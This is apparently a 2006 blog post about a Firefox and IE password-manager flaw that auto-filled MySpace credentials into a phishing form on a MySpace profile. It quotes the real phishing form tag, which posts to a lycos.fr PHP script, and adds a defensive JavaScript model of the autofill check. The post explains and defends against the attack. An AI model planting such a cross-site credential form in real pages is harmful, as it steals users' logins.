Inflation, Investing and Everything


Monday, November 27, 2006

Cross-Site Forms + Password Manager = Security Failure

forums.mozillazine.org -> bugzilla.mozilla.org :

I was shocked today to find an in-the-wild phish that uses nothing more than cross-site forms, and also extracts information from the Password Manager!

The underlying method was so obvious that it should have raised multiple warnings. There were none at all.

It was in a MySpace profile that included this tag:

<form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php" method="post">

What followed was a nearly perfect-looking MySpace login form that used simple HTML and absolute positioning.

Not only did Firefox fail to raise a warning, it auto-filled my www.myspace.com username and password into this form! I hope anyone reading this realizes it is a security failure for the browser to auto-fill the membres.lycos.fr form with credentials from another website ...

- As browser security breaches go, this one is too easy. Be very careful before submitting any form with an auto-filled password. It seems to be a basic design issue that affects both IE and Firefox: convenience versus security.

I kind of ignored this from a couple of weeks back until I went over to Mozillazine and read how the bug works. It really is too easy: all an attacker needs is a website that lets users edit their own HTML, and a victim who has a saved password for that site.

2 weeks on, and still awaiting a 2.0.x fix for Firefox. At least we know that the Firefox folks are working on it.
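The decision the post describes, as an added example (not the post's own code, and not Mozilla's): a small model of a password manager's autofill rule. The page-origin-only rule fills the lycos form because the form sits on a www.myspace.com page; a rule that also compares the form action's origin with the one stored alongside the saved login is the kind of check that refuses it. The saved-login record, the profile URL and the legitimate-looking relative form action are constructed; the phishing form tag is the one quoted above.

```javascript
// Added example: models the autofill decision, not the browser's real code.

// Reduce a URL to its origin (scheme + host), the unit a password manager keys on.
function origin(urlString) {
  const u = new URL(urlString);
  return `${u.protocol}//${u.host}`;
}

// Constructed saved login: where it was entered and where that login form posted to.
// Assumption: MySpace's real login form posts back to www.myspace.com.
const savedLogin = {
  pageOrigin: "http://www.myspace.com",
  actionOrigin: "http://www.myspace.com",
  username: "victim", // constructed
};

// Pull the action attribute out of a <form ...> tag found in page HTML and
// resolve it against the page URL, so relative actions stay on the page's host.
function parseFormAction(formTag, pageUrl) {
  const m = formTag.match(/\baction\s*=\s*["']([^"']*)["']/i);
  const action = m ? m[1] : "";
  return new URL(action, pageUrl).href;
}

// Flawed rule: fill whenever the page hosting the form matches the saved login.
function autofillByPageOrigin(saved, pageUrl, formTag) {
  return origin(pageUrl) === saved.pageOrigin;
}

// Stricter rule: the form must also submit to the origin the login was saved with,
// so a form on a user-editable page that posts elsewhere gets nothing.
function autofillByPageAndAction(saved, pageUrl, formTag) {
  const actionOrigin = origin(parseFormAction(formTag, pageUrl));
  return origin(pageUrl) === saved.pageOrigin && actionOrigin === saved.actionOrigin;
}

// The form tag quoted in the post, and a constructed profile URL hosting it.
const phishForm =
  '<form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php" method="post">';
const profilePage = "http://www.myspace.com/someprofile"; // constructed
// Constructed legitimate-looking form with a relative action (stays on myspace.com).
const legitForm = '<form action="/index.cfm?fuseaction=login.process" method="post">';

console.log("page-origin rule fills phish form:", autofillByPageOrigin(savedLogin, profilePage, phishForm));
console.log("page+action rule fills phish form:", autofillByPageAndAction(savedLogin, profilePage, phishForm));
console.log("page+action rule fills legit form:", autofillByPageAndAction(savedLogin, profilePage, legitForm));
```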

Update - to check whether your browser is vulnerable to this exploit, you can try this demo page by Heise Security (from comment #66 on the Bugzilla page).

(2006-11-27 16:44:53 SGT) [Tech]
